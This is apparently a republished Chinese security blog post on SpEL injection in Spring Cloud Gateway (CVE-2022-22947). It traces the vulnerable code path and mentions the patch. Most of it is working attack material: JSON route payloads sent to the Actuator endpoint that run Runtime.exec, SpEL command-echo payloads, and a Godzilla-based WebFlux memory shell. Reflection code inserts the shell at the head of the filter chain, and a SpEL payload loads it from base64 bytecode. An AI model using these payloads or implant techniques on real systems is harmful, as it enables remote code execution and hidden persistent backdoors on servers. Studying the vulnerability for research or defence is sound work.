这篇文章的主要目的是学习一下spel表达式注入和哥斯拉内存马注入,还有神器java-object-searcher的使用
- spel支持在运行时查询和操作对象图,以API接口的形式创建,所以可以集成到其他应用程序和框架中
spel接口
- ExpressionParser接口:解析器
ExpressionParser接口下的parseExpression()方法将字符串表达式转化为Expression对象
- parseExpression()接收参数:
Expression parseExpression(String expressionString, ParserContext context);其中parserContext定义了字符串表达式是否为模板,和模板开始与结束字符
我们经常看见的spel表达式以#{xxx}的形式出现,他的parserContext如下:
ParserContext parserContext = new ParserContext() { @Override public boolean isTemplate() { return true; } @Override public String getExpressionPrefix() { return "#{"; } @Override public String getExpressionSuffix() { return "}"; } };
- EvaluationContext接口:表示上下文环境。以SpelExpression实现,提供getValue和setValue操作对象值
spel语法
- T(全限定名)表示java.lang.Class,RCE的关键,如下使用
T(java.lang.Runtime)获取了类,并且可以直接使用类下的方法
T(java.lang.Runtime).getRuntime().exec("calc")
- 和java一样的关键字:new进行类实例化,instanceof判断type
new java.lang.ProcessBuilder("calc.exe).start()
- 变量定义和引用:
- 变量定义:
EvaluationContext的setVariable(name,value) - 引用:
#name,还支持#this和#root
- 变量定义:
spel Controller
pom.xml中添加依赖:
<dependency> <groupId>org.springframework</groupId> <artifactId>spring-expression</artifactId> <version>xxx</version> </dependency>
创建一个controller接收字符参数
@Controller public class spel { @RequestMapping("/spel") @ResponseBody public String spel(String input){ SpelExpressionParser parser = new SpelExpressionParser(); Expression expression = parser.parseExpression(input); return expression.getValue().toString(); } }
使用spelExpressionParser接口创建解析器
SpelExpressionParser parser = new SpelExpressionParser();
指定ExpressionParser#parseExpression()来解析表达式
Expression expression = parser.parseExpression(input);
getValue根据上下文获得表达式
expression.getValue().toString();
如果向该Controller HTTP传参,参数名为Input,就能进行spel解析
spel回显
commons-io组件回显。但是需要服务器存在该组件,一般都没有T(org.apache.commons.io.IOUtils).toString(payload).getInputStream())
- jdk>=9时使用JShell
T(SomeWhitelistedClassNotPartOfJDK).ClassLoader.loadClass("jdk.jshell.JShell",true).Methods[6].invoke(null,{}).eval('java payload').toString()
- jdk原生类BufferedReader
new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder( "whoami").start().getInputStream(), "gbk")).readLine()
- scanner
new java.util.Scanner(new java.lang.ProcessBuilder("ls").start().getInputStream(), "GBK").useDelimiter("asfsfsdfsf").next()
useDelimiter为分隔符
源码分析
Spring Cloud GateWay版本:3.1.0&<=3.0.0-3.0.6
源码:https://github.com/spring-cloud/spring-cloud-gateway/releases/tag/v3.1.0
idea打开就能分析了
在shortcutConfigurable#getValue中,#{}包住的进行spel解析,这就是链最后的地方,控制entryValue即可实现spel注入
在shortcutType处使用了getValue
由于是在shortcutType中的normalize中调用的getValue(),所以找也要找调用了shortcutType().normalize()方法的类,ConfigurationService就符合
上文的entry.getValue(),entry即为第一个参数,也就是一个Map。这里控制this.properties为恶意map就能控制spel表达式
在bind()方法中触发了normalizeProperties()方法:
在RouteDefinitionRouteLocator#lookup()方法中对properties进行了设置,然后调用了bind()
properties的值为predicate.getArgs()
在combinePredicates中定义了predicate的值,与routeDefinition有关
在convertToRoute()中调用了combinePredicates()
而在路由初始化时触发convertToRoute()
CacheingRouteLocator#onApplicationEvent()-> CachingRouteLocator#fetch()-> CompositeRouteLocator#getRoutes()-> RouteDefinitionRouteLocator#getRoutes()-> RouteDefinitionRouteLocator#convertToRoute()
漏洞利用
在官方文档https://docs.spring.io/spring-cloud-gateway/docs/3.1.0/reference/html/#actuator-api中,提供了json发送路由请求内容
Actuator API提供了Rest添加路由的方式:
要创建一个路由,请向/gateway/routes/{id_route_to_create}发出一个POST请求,该请求包含一个指定路由字段的JSON主体(见检索某个特定路由的信息)。要删除一个路由,请向/gateway/routes/{id_route_to_delete}发出一个DELETE请求。
http://xxx/actuator/gateway/routes/{xxx}添加路由
也就是可以向http://xxx/actuator/gateway/routes/godown如下payload进行注入
{ "id": "godown", "predicates": [{ "name": "Path", "args": {"_genkey_0":"#{T(java.lang.Runtime).getRuntime().exec('calc')}"} }], "filters": [], "uri": "https://www.uri-destination.org", "order": 0 }
创建完之后向http://xxx/actuator/gateway/refresh发送请求即可刷新
其实添加的这部分路由对应着配置文件中的route部分:
注意在创建路由的时候把content-type改为application/json
拓展链
上文payload里的其他参数有没有用?name为什么要是Path?
借用奇安信的一张调用栈图:
在RouteDefinitionRouteLocator#convertToRoute()方法处
除了会调用combinePredicates,还会调用getFilters来触发loadGatewayFilters进行bind
所以在filters处注入也是可以的
- 奇安信攻防实验室对各种过滤器进行了实验,事实证明所有过滤器都可以:https://forum.butian.net/share/1410
过滤器名称:
AddRequestHeader MapRequestHeader AddRequestParameter AddResponseHeader ModifyRequestBody DedupeResponseHeader ModifyResponseBody CacheRequestBody PrefixPath PreserveHostHeader RedirectTo RemoveRequestHeader RemoveRequestParameter RemoveResponseHeader RewritePath Retry SetPath SecureHeaders SetRequestHeader SetRequestHostHeader SetResponseHeader RewriteResponseHeader RewriteLocationResponseHeader SetStatus SaveSession StripPrefix RequestHeaderToRequestUri RequestSize RequestHeaderSize
payload:
{ "id": "first_route", "predicates": [], "filters": [{ "name": "Retry", "args": { "name": "payload", "value": "123" } }], "uri": "https://www.uri-destination.org", "order": 0 }
修改filters.name为任意合法过滤器名,payload处改为spel表达式
同理,predicates里的name,我们之前用的Path
实际上下列predicates都能用:
回显
用户定义的路由信息会存在内存中,refresh后会把结果写入路由信息。通过路由信息的API看到RCE的结果(就上面payload注册完路由后GET访问路由路径)
- 利用RedirectTO过滤器注入:
{ "id": "first_route", "predicates": [], "filters": [{ "name": "RedirectTo", "args": { "status": "302", "url": "payload" } }], "uri": "https://www.uri-destination.org", "order": 0 }
在spring官方文档可以看到RedirectTo接收两个参数,一个status一个url,但是会验证参数类型,也就是说status就必须是枚举类型,url就会进行url解析,所以该过滤器不能使用,没有传入字符串类型的参数,如RemoveRequestHeader,同理对predicates链
注入内存马
spring cloud gateway是基于WebFlux的,关于WebFlux,这篇文章有详尽的说明:
https://juejin.cn/post/7001032584821997598
web服务基于netty和spring,c0ny1佬对针对netty和spring构造了内存马
netty内存马
netty处理http请求会用pipeline链上的handler依次来处理,内存马就是模拟注册一个handler。但是netty是动态构造pipeline。
动态添加handler的CompositeChannelPipelineConfigurer的compositeChannelPipelineConfigurer第二个参数other默认为空,即默认第一个。如果第二个参数other有值,将被合并为一个新Configurer
使用reactor.netty.transport.TransportConfig#doOnchannelInit来获取Configurer
至于构造netty内存马的代码,已经来到了知识盲区,直接移步https://mp.weixin.qq.com/s/S15erJhHQ4WCVfF0XxDYMg
内存马
分析一遍mieea佬的webFilter内存马
spring Webflux是有filter的,在官方文档里有:
我们知道filter一般都是一个链,在这里是用DefaultWebFilterChain
在DefaultWebFilterChain#invokefilter()处触发filter
可以看到filter()参数只有ServerWebExchange,那模拟就return调用下一个filter构成filter链
一个Filter Demo:
import org.springframework.core.annotation.Order; import org.springframework.stereotype.Component; import org.springframework.web.server.ServerWebExchange; import org.springframework.web.server.WebFilter; import org.springframework.web.server.WebFilterChain; import reactor.core.publisher.Mono; @Component @Order(value = 2) public class NormalFilter implements WebFilter{ @Override public Mono<Void> filter(ServerWebExchange exchange, WebFilterChain chain) { return chain.filter(exchange); } }
反射利用DefaultWebFilterChain#initChain()模拟注册一个filter:
该Chain由FilteringWebHandler生成实例,直接new FilteringWebHandler就能将Filter插入到首位
poc构造:
调试环境:https://github.com/Ha0Liu/CVE-2022-22947
使用c0ny1师傅的java-Object-searcher工具(https://github.com/c0ny1/java-object-searcher)找到内存中DefaultWebFilterChain的位置
新建一个NormalFilter,把编译好的java-obejct-searcher-0.1.0.jar导入到target目录下,项目启动后触发一遍filter
import me.gv7.tools.josearcher.entity.Blacklist; import me.gv7.tools.josearcher.entity.Keyword; import me.gv7.tools.josearcher.searcher.SearchRequstByBFS; import org.springframework.core.annotation.Order; import org.springframework.stereotype.Component; import org.springframework.web.server.ServerWebExchange; import org.springframework.web.server.WebFilter; import org.springframework.web.server.WebFilterChain; import reactor.core.publisher.Mono; import java.util.ArrayList; import java.util.List; @Component @Order(value = 2) public class NormalFilter implements WebFilter { @Override public Mono<Void> filter(ServerWebExchange exchange, WebFilterChain chain) { //设置搜索类型包含Request关键字的对象 List<Keyword> keys = new ArrayList<>(); keys.add(new Keyword.Builder().setField_type("chain").build()); List<Blacklist> blacklists = new ArrayList<>(); blacklists.add(new Blacklist.Builder().setField_type("java.io.File").build()); SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys); searcher.setBlacklists(blacklists); searcher.setIs_debug(true); searcher.setMax_search_depth(10); searcher.setReport_save_path("xx"); searcher.searchObject(); return chain.filter(exchange); } }
如下:
于是我们得到内存马构造的流程:
- 构造恶意filter
哥斯拉里面生成jsp的马
filter不能影响正常的业务,加一个身份验证的http头:
String authorizationHeader = exchange.getRequest().getHeaders().getFirst(HttpHeaders.AUTHORIZATION); if(authorizationHeader != null && authorizationHeader.equals(auth)) {......}
表单数据用ServerWebexchange.getFormData()获取
Mono<MultiValueMap<String, String>> formData = exchange.getFormData();
获取到的数据是键值对数据流,用flatMap对数据流进行合并化:
Mono bufferStream = formData.flatMap(map -> { String passStr = map.getFirst(pass); StringBuilder result = new StringBuilder(); ...... return Mono.just(new DefaultDataBufferFactory().wrap(result.toString().getBytes(StandardCharsets.UTF_8))); });
为方便移植,把哥斯拉的session换成Map<String,Object>
public static Map<String, Object> store = new HashMap<>();
- 从线程中获取到DefaultWebFilterChain:
getThreads = Thread.class.getDeclaredMethod("getThreads"); getThreads.setAccessible(true); Object threads = getThreads.invoke(null); for (int i = 0; i < Array.getLength(threads); i++) { Object thread = Array.get(threads, i); if (thread != null && thread.getClass().getName().contains("NettyWebServer")) { // 获取defaultWebFilterChain NettyWebServer nettyWebServer = (NettyWebServer) getFieldValue(thread, "this$0",false); ReactorHttpHandlerAdapter reactorHttpHandlerAdapter = (ReactorHttpHandlerAdapter) getFieldValue(nettyWebServer, "handler",false); Object delayedInitializationHttpHandler = getFieldValue(reactorHttpHandlerAdapter,"httpHandler",false); HttpWebHandlerAdapter httpWebHandlerAdapter= (HttpWebHandlerAdapter)getFieldValue(delayedInitializationHttpHandler,"delegate",false); ExceptionHandlingWebHandler exceptionHandlingWebHandler= (ExceptionHandlingWebHandler)getFieldValue(httpWebHandlerAdapter,"delegate",true); FilteringWebHandler filteringWebHandler = (FilteringWebHandler)getFieldValue(exceptionHandlingWebHandler,"delegate",true); DefaultWebFilterChain defaultWebFilterChain= (DefaultWebFilterChain)getFieldValue(filteringWebHandler,"chain",false);
- 将恶意filter插入到Chain中,并指定到首位(0位)
List<WebFilter> newAllFilters= new ArrayList<>(defaultWebFilterChain.getFilters()); newAllFilters.add(0,new FilterMemshellPro()); DefaultWebFilterChain newChain = new DefaultWebFilterChain((WebHandler) handler, newAllFilters);
生成filteringWebHandler:
Field f = filteringWebHandler.getClass().getDeclaredField("chain"); .... f.set(filteringWebHandler,newChain);
直达github完整poc:https://github.com/mieeA/SpringWebflux-MemShell/
spel表达式注入字节码
Memshell改为你的软件包名+shell
#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}
其中
'yv66vgAAA....'为Base64Encode的字节码,可通过如下代码生成:import org.springframework.util.Base64Utils; import java.io.*; import java.nio.charset.StandardCharsets; public class EncodeShell { public static void main(String[] args){ byte[] data = null; try { InputStream in = new FileInputStream("MemShell.class"); data = new byte[in.available()]; in.read(data); in.close(); } catch (IOException e) { e.printStackTrace(); } String shellStr = Base64Utils.encodeToString(data); System.out.println(shellStr); try { OutputStream out = new FileOutputStream("ShellStr.txt"); out.write(shellStr.getBytes(StandardCharsets.UTF_8)); out.flush(); out.close(); } catch (IOException e) { e.printStackTrace(); } } }
如果注入过程有问题,可以在docker中看下Log
漏洞修复
https://github.com/spring-cloud/spring-cloud-gateway/commit/d8c255eddf4eb5f80ba027329227b0d9e2cd9698
commit的历史中,把StandardEvaluationContext替换为了SimpleEvalutionContext
参考:spel表达式注入
http://wjlshare.com/archives/1748
如有侵权请联系:admin#unsafe.sh